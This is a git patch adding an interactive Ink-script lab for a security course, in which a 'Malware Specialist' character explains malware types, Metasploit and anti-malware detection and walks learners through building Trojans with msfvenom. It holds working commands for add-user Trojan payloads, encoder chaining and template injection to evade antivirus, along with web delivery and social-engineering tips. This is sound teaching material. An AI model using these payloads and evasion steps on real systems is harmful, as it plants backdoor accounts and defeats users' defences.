From fbcc23b375b2fc214e5fb9c887e14cf30da95885 Mon Sep 17 00:00:00 2001 From: "Z. Cliffe Schreuders" Date: Wed, 19 Nov 2025 18:24:26 +0000 Subject: [PATCH] feat: Add GBL malware and Metasploit Framework lab sheet --- .../ink/lab_sheets/malware_metasploit.ink | 654 ++++++++++++++++++ 1 file changed, 654 insertions(+) create mode 100644 story_design/ink/lab_sheets/malware_metasploit.ink diff --git a/story_design/ink/lab_sheets/malware_metasploit.ink b/story_design/ink/lab_sheets/malware_metasploit.ink new file mode 100644 index 0000000..48813b3 --- /dev/null +++ b/story_design/ink/lab_sheets/malware_metasploit.ink 
@@ -0,0 +1,654 @@ +// =========================================== +// MALWARE AND METASPLOIT LAB +// Introduction to Malware and Payloads +// =========================================== +// Game-Based Learning replacement for lab sheet +// Original: introducing_attacks/2_malware_msf_payloads.md +// =========================================== + +// Global persistent state +VAR instructor_rapport = 0 +VAR ethical_awareness = 0 + +// External variables +EXTERNAL player_name + +// =========================================== +// ENTRY POINT +// =========================================== + +=== start === +Malware Specialist: Welcome to Malware Analysis and Metasploit Fundamentals, Agent {player_name}. + +Malware Specialist: This lab covers malicious software - what it is, how it works, and how to create and analyze it in controlled environments. + +Malware Specialist: Before we begin, ethical boundaries reminder: everything we cover is for authorized penetration testing and security research. Creating or deploying malware against systems you don't have explicit permission to test is illegal. + +* [Understood - authorized testing only] + ~ ethical_awareness += 15 + You: Clear. Authorized environments, defensive purpose, professional responsibility. + Malware Specialist: Excellent. Let's proceed. + -> malware_hub +* [I understand the constraints] + ~ ethical_awareness += 5 + You: I understand the ethical boundaries. + Malware Specialist: Good. Keep that in mind throughout. + -> malware_hub + +// =========================================== +// MAIN HUB +// =========================================== + +=== malware_hub === +Malware Specialist: What aspect of malware and Metasploit would you like to explore? 
+ ++ [Types of malware and classifications] + -> malware_types ++ [Introduction to Metasploit Framework] + -> metasploit_intro ++ [Creating payloads with msfvenom] + -> msfvenom_basics ++ [Anti-malware detection methods] + -> antimalware_detection ++ [Evasion techniques and polymorphic malware] + -> evasion_techniques ++ [Remote Access Trojans (RATs)] + -> rat_intro ++ [Show me the commands reference] + -> commands_reference ++ [Practical challenge tips] + -> challenge_tips ++ [I'm ready for the lab exercises] + -> ready_for_practice ++ [That's all for now] + #exit_conversation + -> END + +// =========================================== +// MALWARE TYPES +// =========================================== + +=== malware_types === +~ instructor_rapport += 5 + +Malware Specialist: Malware - malicious software. Programs designed to carry out harmful actions. + +Malware Specialist: Microsoft's old TechNet essay put it well: "If a bad guy can persuade you to run his program on your computer, it's not your computer anymore." + +Malware Specialist: That's the core threat. A program running on your system has access to everything you have access to. If it runs as admin/root, even worse. + +* [What are the main types?] + You: How is malware classified? + -> malware_taxonomy +* [Why target Windows most?] + You: Why is Windows the primary target? + Malware Specialist: Market share. Windows dominates desktop OS usage. More targets means more potential victims. + Malware Specialist: Though macOS, Linux, Android, iOS all have malware too. Platform diversity is shifting the landscape. + Malware Specialist: Also, each Windows version adds security mitigations. We test on Windows 7 in labs because its mitigations are well-understood and bypassable for learning purposes. 
+ ~ instructor_rapport += 5 + -> malware_types +* [Understood] + -> malware_hub + +=== malware_taxonomy === +~ instructor_rapport += 8 + +Malware Specialist: Main classifications: + +Malware Specialist: **Trojans** - malicious software posing as legitimate. Named after the Greek myth. A "game" that's actually a backdoor. +- Doesn't self-propagate +- May provide remote access (RAT - Remote Access Trojan) +- May spy on users (spyware, keyloggers) +- May force advertising (adware) + +Malware Specialist: **Viruses** - automatically spread to other programs on the same system. Infect executables, documents, boot sectors. + +Malware Specialist: **Worms** - automatically spread to other computers on the network. Self-propagating across systems via exploits, email, etc. + +Malware Specialist: **Rootkits** - hide the presence of infection. Manipulate OS to conceal malicious processes, files, network connections. + +Malware Specialist: **Zombies/Botnets** - infected systems receiving remote commands. Collections form botnets for DDoS, spam, crypto mining. + +Malware Specialist: **Ransomware** - encrypts victim files, demands payment for decryption keys. Often uses cryptocurrency for anonymity. + +* [Tell me more about Trojans] + You: Trojans seem most relevant to this lab? + Malware Specialist: Correct. We'll focus on creating Trojan horses - programs that appear innocent but perform malicious actions. + Malware Specialist: Social engineering is key. Convince victim to run it. No exploitation required if they willingly execute it. + ~ instructor_rapport += 8 + -> malware_hub +* [How do these overlap?] + You: Can malware be multiple types? + Malware Specialist: Absolutely. A Trojan worm that installs a rootkit, for example. + Malware Specialist: Modern malware is often multi-stage: dropper Trojan delivers second-stage payload which installs persistent backdoor with rootkit capabilities. 
+ Malware Specialist: Taxonomy helps us discuss and categorize, but real malware can be complex, multi-functional. + ~ instructor_rapport += 10 + -> malware_hub +* [Got it] + -> malware_hub + +// =========================================== +// METASPLOIT FRAMEWORK +// =========================================== + +=== metasploit_intro === +~ instructor_rapport += 5 + +Malware Specialist: Metasploit Framework - one of the most powerful penetration testing tools available. + +Malware Specialist: Contains extensive library of exploits, payloads, auxiliary modules, and post-exploitation tools. Framework for developing custom exploits. + +Malware Specialist: Open source, maintained by Rapid7. Free framework version (what we use) and commercial Pro version with GUI. + +Malware Specialist: We're using command-line tools - teaches you more about concepts and mechanics. + +* [What can Metasploit do?] + You: What's the scope of Metasploit's capabilities? + Malware Specialist: Enormous scope: + - Exploit development and execution + - Payload generation (what we're focusing on) + - Post-exploitation (once you've compromised a system) + - Auxiliary modules (scanners, sniffers, fuzzers) + - Evasion and anti-forensics + ~ instructor_rapport += 8 + -> metasploit_intro +* [Why is it legal to distribute?] + You: How is this legal if it creates malware? + ~ ethical_awareness += 10 + Malware Specialist: Excellent question. Shows good critical thinking. + Malware Specialist: Metasploit is a *tool*. Hammer can build houses or break windows. The tool isn't illegal - misuse is. + Malware Specialist: Legitimate uses: penetration testing, security research, education, vulnerability assessment, red team exercises. + Malware Specialist: It's widely used by security professionals to identify weaknesses before attackers do. + ~ instructor_rapport += 15 + -> metasploit_intro +* [Tell me about payloads] + You: What exactly is a payload? 
+ -> payload_explanation +* [Back to main menu] + -> malware_hub + +=== payload_explanation === +~ instructor_rapport += 8 + +Malware Specialist: Payload - the malicious code you want to execute on a victim's system. + +Malware Specialist: The "payload" is what the attack delivers. Exploit gets you access, payload is what you do with that access. + +Malware Specialist: Metasploit has hundreds of payloads: add users, open shells, steal data, capture screenshots, log keystrokes, establish persistent access. + +Malware Specialist: msfvenom is the tool for generating standalone payloads - creates executable files containing the payload code. + +* [How do I see available payloads?] + You: How many payloads exist? + Malware Specialist: `msfvenom -l payloads | less` lists them all. Hundreds. + Malware Specialist: Platform-specific: windows, linux, osx, android, etc. + Malware Specialist: Various functions: shells, meterpreter, exec commands, VNC, etc. + Malware Specialist: Each has configurable options for IP addresses, ports, usernames, etc. + ~ instructor_rapport += 5 + -> payload_explanation +* [What's the simplest payload?] + You: What's a basic example? + Malware Specialist: `windows/adduser` - simply adds a user account to Windows. + Malware Specialist: Configuration: USER= (username), PASS= (password) + Malware Specialist: Generate: `msfvenom -p windows/adduser USER=hacker PASS=P@ssw0rd123 -f exe > trojan.exe` + Malware Specialist: Victim runs trojan.exe, new admin account created. Simple, effective Trojan. + ~ instructor_rapport += 5 + -> payload_explanation +* [Understood] + -> metasploit_intro + +// =========================================== +// MSFVENOM BASICS +// =========================================== + +=== msfvenom_basics === +~ instructor_rapport += 5 + +Malware Specialist: msfvenom - Metasploit's payload generator. Combines old msfpayload and msfencode functionality. 
+ +Malware Specialist: Generates standalone payloads in various formats: executables, shellcode, scripts, etc. + +Malware Specialist: Basic workflow: +1. Choose payload +2. Configure options +3. Select output format +4. Generate file + +* [Walk me through creating a Trojan] + You: Show me the complete process. + -> trojan_creation_walkthrough +* [What output formats exist?] + You: What formats can msfvenom generate? + Malware Specialist: `msfvenom -l formats` lists them all. + Malware Specialist: Common formats: + - exe: Windows executable + - elf: Linux executable + - dll: Windows library + - python, ruby, perl: Scripts in various languages + - c, java: Source code + - raw: Raw shellcode + Malware Specialist: Choose format based on target platform and delivery method. + ~ instructor_rapport += 8 + -> msfvenom_basics +* [How do I configure payloads?] + You: What about payload options? + Malware Specialist: `msfvenom -p payload_name --list-options` shows available options. + Malware Specialist: Common options: LHOST (attacker IP), LPORT (attacker port), RHOST (target IP), USER, PASS, etc. + Malware Specialist: Set with KEY=value syntax: `msfvenom -p windows/adduser USER=bob PASS=secret123` + ~ instructor_rapport += 5 + -> msfvenom_basics +* [Back to main menu] + -> malware_hub + +=== trojan_creation_walkthrough === +~ instructor_rapport += 10 + +Malware Specialist: Complete Trojan creation example: + +Malware Specialist: **Step 1:** Choose payload +`msfvenom -l payloads | grep windows/adduser` + +Malware Specialist: **Step 2:** Check options +`msfvenom -p windows/adduser --list-options` + +Malware Specialist: **Step 3:** Generate executable +`msfvenom -p windows/adduser USER=backdoor PASS=SecurePass123 -f exe > game.exe` + +Malware Specialist: **Step 4:** Deliver to victim (in lab: web server) +`sudo cp game.exe /var/www/html/share/` +`sudo service apache2 start` + +Malware Specialist: **Step 5:** Victim downloads and runs game.exe +(Social engineering: "Free game! 
Click to play!") + +Malware Specialist: **Step 6:** Verify success +On victim system: `net user` shows new backdoor account + +Malware Specialist: That's the basic flow. Simple but effective if victim trusts you enough to run the file. + +* [How do I make it less suspicious?] + You: How do I make it seem legitimate? + Malware Specialist: Several techniques: icon changing, using templates, binding to legitimate programs, adding decoy functionality. + Malware Specialist: We'll cover evasion techniques separately. Short answer: embed payload in real program so it both executes malware AND runs expected functionality. + ~ instructor_rapport += 10 + -> msfvenom_basics +* [What about detection?] + You: Won't anti-malware catch this? + Malware Specialist: Basic msfvenom payloads with default settings? Absolutely detected by modern anti-malware. + Malware Specialist: That's why we need evasion techniques - encoding, obfuscation, template injection. + -> antimalware_detection +* [Clear walkthrough] + -> msfvenom_basics + +// =========================================== +// ANTI-MALWARE DETECTION +// =========================================== + +=== antimalware_detection === +~ instructor_rapport += 5 + +Malware Specialist: Anti-malware software - defensive tools attempting to detect and block malicious software. + +Malware Specialist: Two main detection approaches: signature-based and anomaly-based. + +* [Explain signature-based detection] + You: How does signature-based detection work? + -> signature_based +* [Explain anomaly-based detection] + You: How does anomaly-based detection work? + -> anomaly_based +* [How do I test against anti-malware?] + You: How can I test my payloads? + Malware Specialist: ClamAV - open-source anti-malware scanner. + Malware Specialist: `clamscan` scans current directory for malware. + Malware Specialist: Basic msfvenom payloads get detected immediately. Tells you if your evasion worked. 
+ Malware Specialist: VirusTotal.com tests against 50+ scanners - but uploading shares your malware with vendors. Good for testing, bad for operational security. + ~ instructor_rapport += 8 + -> antimalware_detection +* [Back to main menu] + -> malware_hub + +=== signature_based === +~ instructor_rapport += 8 + +Malware Specialist: Signature-based detection - blacklist of known malware patterns. + +Malware Specialist: **How it works:** +- Malware researchers analyze malicious code +- Extract unique signatures (byte patterns, hashes, code structures) +- Add to signature database +- Scanner compares files against database + +Malware Specialist: **Advantages:** +- High accuracy for known threats +- Low false positive rate +- Resource efficient +- Mature, well-understood technology + +Malware Specialist: **Disadvantages:** +- Useless against unknown malware (zero-days) +- Requires constant signature updates +- Polymorphic malware can evade (same function, different code) +- Always reactive, never proactive + +* [How do hashes relate to signatures?] + ~ instructor_rapport += 10 + You: You mentioned hashes earlier? + Malware Specialist: Simple signature approach: hash the entire malware file. + Malware Specialist: `sha256sum malware.exe` produces unique fingerprint. + Malware Specialist: Change one byte? Completely different hash. That's the evasion opportunity. + Malware Specialist: Re-encode payload → different file → different hash → evades hash-based detection. + Malware Specialist: Modern scanners use more sophisticated signatures than simple hashes, but principle remains. + ~ instructor_rapport += 10 + -> signature_based +* [Understood] + -> antimalware_detection + +=== anomaly_based === +~ instructor_rapport += 8 + +Malware Specialist: Anomaly-based detection - identifies malicious behavior rather than known signatures. 
+ +Malware Specialist: **How it works:** +- Establish baseline of normal system behavior +- Monitor processes, registry changes, network connections, file access +- Flag deviations from normal as potentially malicious +- May use machine learning, heuristics, behavioral analysis + +Malware Specialist: **Advantages:** +- Detects unknown threats (zero-days) +- Adapts to new attack methods +- More comprehensive than signature matching +- Less dependent on frequent updates + +Malware Specialist: **Disadvantages:** +- False positives (legitimate software flagged) +- Complex implementation and tuning +- Resource intensive (continuous monitoring) +- Difficult to establish baseline (what's "normal"?) + +* [Give me an example] + You: What behaviors trigger anomaly detection? + Malware Specialist: Suspicious patterns: + - Process creating multiple network connections + - Modification of system files + - Injection into other processes + - Encryption of large numbers of files (ransomware behavior) + - Keylogging-like keyboard hooks + - Persistence mechanisms (registry keys, startup folders) + Malware Specialist: Problem: legitimate software sometimes does these things too. Anti-cheat software for games triggers false positives constantly. + ~ instructor_rapport += 10 + -> anomaly_based +* [Which is better?] + You: Which detection method is superior? + Malware Specialist: Both. Modern anti-malware uses layered approach. + Malware Specialist: Signature-based catches known threats efficiently. Anomaly-based catches unknowns. + Malware Specialist: Add heuristics, sandboxing, reputation scoring, machine learning - defense in depth. + Malware Specialist: No single method is perfect. Combine multiple for better coverage. 
+ ~ instructor_rapport += 10 + -> anomaly_based +* [Got it] + -> antimalware_detection + +// =========================================== +// EVASION TECHNIQUES +// =========================================== + +=== evasion_techniques === +~ instructor_rapport += 5 + +Malware Specialist: Evasion - making malware undetectable to anti-malware scanners. + +Malware Specialist: Key techniques: encoding, obfuscation, template injection, packing, encryption. + +Malware Specialist: Goal: change how malware looks without changing what it does. + +* [Explain encoding] + You: How does encoding help evasion? + -> encoding_evasion +* [Explain template injection] + You: What's template injection? + -> template_injection +* [What's polymorphic malware?] + You: You mentioned polymorphic malware earlier? + Malware Specialist: Polymorphic malware - changes its appearance while maintaining functionality. + Malware Specialist: Stores payload in encoded/encrypted form. Includes decoder stub that unpacks it at runtime. + Malware Specialist: Each iteration looks different (different encoding, different decryptor), but does the same thing. + Malware Specialist: This is what msfvenom encoders create - polymorphic payloads. + ~ instructor_rapport += 10 + -> evasion_techniques +* [Back to main menu] + -> malware_hub + +=== encoding_evasion === +~ instructor_rapport += 10 + +Malware Specialist: Encoding for evasion - re-encode payload so file looks different but executes identically. + +Malware Specialist: msfvenom supports multiple encoders. View list: `msfvenom -l encoders` + +Malware Specialist: Common encoder: shikata_ga_nai (Japanese for "it can't be helped" - popular polymorphic encoder) + +Malware Specialist: Usage: +`msfvenom -p windows/adduser USER=test PASS=pass123 -e x86/shikata_ga_nai -i 10 -f exe > encoded.exe` + +Malware Specialist: `-e` specifies encoder, `-i` specifies iterations (encode 10 times) + +* [Does more encoding help?] + You: Is 10 iterations better than 1? 
+ Malware Specialist: Diminishing returns. More iterations makes different file, but modern scanners analyze behavior, not just signatures. + Malware Specialist: Encoding helps evade simple hash/signature checks. Won't help against heuristic or behavioral analysis. + Malware Specialist: 5-10 iterations often sufficient for signature evasion. Beyond that, template injection more effective. + ~ instructor_rapport += 8 + -> encoding_evasion +* [Can I chain encoders?] + You: Can I use multiple different encoders? + Malware Specialist: Absolutely. Pipe msfvenom outputs: + `msfvenom -p payload -e encoder1 -i 3 | msfvenom -e encoder2 -i 5 -f exe > multi_encoded.exe` + Malware Specialist: Each encoder transforms output differently. Chaining increases obfuscation. + Malware Specialist: Though again, modern AV looks deeper than surface encoding. + ~ instructor_rapport += 10 + -> encoding_evasion +* [Understood] + -> evasion_techniques + +=== template_injection === +~ instructor_rapport += 10 + +Malware Specialist: Template injection - embedding payload inside legitimate executable. + +Malware Specialist: Makes malware look like real software. Both malicious code AND original program execute. + +Malware Specialist: msfvenom `-x` flag specifies template executable: +`msfvenom -p windows/exec CMD='net user /add hacker pass123' -x notepad.exe -f exe > my_notepad.exe` + +Malware Specialist: Result: executable that opens Notepad (seems normal) while also adding user account (malicious). + +* [Why is this effective?] + You: How does this evade detection? + Malware Specialist: Several reasons: + - File structure resembles legitimate program + - Contains real code from original program + - Signature scanners see legitimate program signatures too + - Behavioral analysis sees expected behavior (Notepad opens) alongside malicious + Malware Specialist: Not perfect, but more effective than bare encoded payload. 
+ ~ instructor_rapport += 10 + -> template_injection +* [What programs make good templates?] + You: Which programs should I use as templates? + Malware Specialist: Context-dependent. Match victim's expectations: + - Games for game-focused social engineering + - Utilities (calc.exe, notepad.exe) for general purpose + - Industry-specific software for targeted attacks + Malware Specialist: Smaller files better (less suspicious download size). + Malware Specialist: Legitimate signed programs add credibility. + ~ instructor_rapport += 8 + -> template_injection +* [Can I combine encoding and templates?] + You: Can I use both techniques together? + Malware Specialist: Absolutely recommended. Encode first, then inject into template: + `msfvenom -p payload -e encoder -i 7 | msfvenom -x template.exe -f exe > output.exe` + Malware Specialist: Layered evasion: encoding changes signature, template adds legitimacy. + Malware Specialist: In practice: well-encoded, template-injected payloads evade many scanners. + ~ instructor_rapport += 10 + -> template_injection +* [Got it] + -> evasion_techniques + +// =========================================== +// REMOTE ACCESS TROJANS +// =========================================== + +=== rat_intro === +~ instructor_rapport += 5 + +Malware Specialist: Remote Access Trojans (RATs) - malware providing attacker with remote control of victim system. + +Malware Specialist: Classic architecture: client-server model. +- Server (victim runs this): listens for connections, executes commands +- Client (attacker uses this): connects to server, sends commands + +Malware Specialist: RAT capabilities typically include: remote shell, file transfer, screenshot capture, keylogging, webcam access, process manipulation. + +* [How do RATs differ from what we've done?] + You: How is this different from adduser payload? + Malware Specialist: adduser is single-action. Runs once, adds user, exits. + Malware Specialist: RAT provides persistent, interactive access. 
Attacker can issue multiple commands over time. + Malware Specialist: More powerful, more flexible, more risk if detected. + ~ instructor_rapport += 8 + -> rat_intro +* [What Metasploit payloads create RATs?] + You: Which payloads provide remote access? + Malware Specialist: Several options: + - windows/meterpreter/reverse_tcp - full-featured RAT + - windows/shell/reverse_tcp - simple command shell + - windows/vnc/reverse_tcp - graphical remote access + Malware Specialist: Meterpreter is most powerful - extensive post-exploitation features. + Malware Specialist: Reverse shells covered in later labs. Advanced topic. + ~ instructor_rapport += 8 + -> rat_intro +* [Why "reverse"?] + You: What does "reverse" mean in reverse_tcp? + Malware Specialist: Normal: attacker connects TO victim (requires open port on victim, often firewalled). + Malware Specialist: Reverse: victim connects TO attacker (outbound connections usually allowed). + Malware Specialist: Victim initiates connection, attacker listens. Bypasses most firewalls. + Malware Specialist: Essential technique for real-world scenarios where victims are behind NAT/firewalls. 
+ ~ instructor_rapport += 10 + -> rat_intro +* [Understood] + -> malware_hub + +// =========================================== +// COMMANDS REFERENCE +// =========================================== + +=== commands_reference === +Malware Specialist: Quick reference for Metasploit and malware-related commands: + +Malware Specialist: **msfvenom basics:** +- List payloads: `msfvenom -l payloads` +- List encoders: `msfvenom -l encoders` +- List formats: `msfvenom -l formats` +- Show options: `msfvenom -p payload_name --list-options` + +Malware Specialist: **Creating payloads:** +- Basic: `msfvenom -p windows/adduser USER=name PASS=pass -f exe > trojan.exe` +- Encoded: `msfvenom -p payload -e x86/shikata_ga_nai -i 10 -f exe > output.exe` +- With template: `msfvenom -p payload -x template.exe -f exe > output.exe` +- Combined: `msfvenom -p payload -e encoder -i 5 | msfvenom -x template.exe -f exe > final.exe` + +Malware Specialist: **Testing payloads:** +- Hash file: `sha256sum filename.exe` +- Scan with ClamAV: `clamscan` +- Scan specific file: `clamscan filename.exe` + +Malware Specialist: **Web server (payload delivery):** +- Create share directory: `sudo mkdir /var/www/html/share` +- Copy payload: `sudo cp malware.exe /var/www/html/share/` +- Start Apache: `sudo service apache2 start` +- Access from victim: http://KALI_IP/share/malware.exe + +Malware Specialist: **Windows victim verification:** +- List users: `net user` +- Check specific user: `net user username` + ++ [Back to main menu] + -> malware_hub + +// =========================================== +// CHALLENGE TIPS +// =========================================== + +=== challenge_tips === +Malware Specialist: Practical tips for lab challenges: + +Malware Specialist: **Creating effective Trojans:** +- Start simple (windows/adduser or windows/exec) +- Test unencoded version first to ensure payload works +- Then add encoding, check if detection increases +- Finally try template injection for best evasion + +Malware 
Specialist: **Evasion tips:** +- Experiment with different encoders and iteration counts +- Shikata_ga_nai is popular but widely signatured - try others +- Chain multiple encoders for better results +- Use legitimate programs as templates (notepad, calc, small utilities) +- Test against ClamAV before trying against victim +- Don't upload to VirusTotal if you want evasion to last (shares sample with AV vendors) + +Malware Specialist: **Delivery tips:** +- Make filename convincing (game.exe, important_document.exe, update.exe) +- Social engineering matters - victim needs reason to run it +- In real scenarios: icons, file properties, code signing all add legitimacy +- For lab: simple web delivery works fine + +Malware Specialist: **Verification:** +- Windows: `net user` shows created accounts +- Check Admin group: `net localgroup administrators` +- If payload fails, check syntax and password complexity requirements +- Passwords need: uppercase, lowercase, numbers (e.g., SecurePass123) + +Malware Specialist: **Troubleshooting:** +- Payload doesn't work? Test simpler version without encoding +- Still detected by AV? Try different template or more encoding iterations +- Apache won't start? `sudo service apache2 status` for error info +- Can't download from Kali? Check IP address (`ip a`) and firewall rules + +{instructor_rapport >= 50: + Malware Specialist: You've engaged deeply with the material and asked excellent questions. You're well-prepared for the practical exercises. +} + ++ [Back to main menu] + -> malware_hub + +// =========================================== +// READY FOR PRACTICE +// =========================================== + +=== ready_for_practice === +Malware Specialist: Good. You've covered the core concepts. + +Malware Specialist: Lab objectives: +1. Create basic Trojan using msfvenom +2. Test against anti-malware (ClamAV) +3. Use encoding to evade detection +4. Inject payload into legitimate program template +5. 
Deliver via web server to Windows victim +6. Verify successful exploitation + +{ethical_awareness >= 10: + Malware Specialist: You've demonstrated solid ethical awareness. Remember: controlled lab environment, authorized testing only. +} + +Malware Specialist: The skills you're learning are powerful. Metasploit is used by professional penetration testers worldwide. + +Malware Specialist: But also by criminals. The difference is authorization and intent. + +Malware Specialist: You're learning these techniques to defend against them - to understand attacker methods, test organizational defenses, and improve security posture. + +Malware Specialist: One final reminder: creating or deploying malware against unauthorized systems is computer fraud. Felony-level crime. Only use these skills in authorized contexts: penetration testing contracts, security research, education labs, your own isolated systems. + +Malware Specialist: Now go create some Trojans. Good luck, Agent {player_name}. + +#exit_conversation +-> END
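Review bot: the `~ instructor_rapport += N` line at the top of most knots is re-executed every time a sub-choice diverts back into the same knot (`-> malware_types`, `-> payload_explanation`, `-> signature_based`, `-> anomaly_based`, `-> encoding_evasion`, `-> template_injection`, `-> rat_intro`), so rapport is credited once per loop rather than once per topic, and the `{instructor_rapport >= 50:` gate in `challenge_tips` becomes reachable just by cycling through sub-choices. Guard the top-of-knot award with the knot's visit count, e.g. `{ malware_types == 1:` / `~ instructor_rapport += 5` / `}`, or move the award into the once-only choices where the per-branch `+=` lines already live. Smaller point, `trojan_creation_walkthrough` Step 6: verification only runs `net user`, while the Verification list in `challenge_tips` also uses `net localgroup administrators`; the walkthrough should include that second check so learners confirm what privilege level the created account ended up with, not only that it exists.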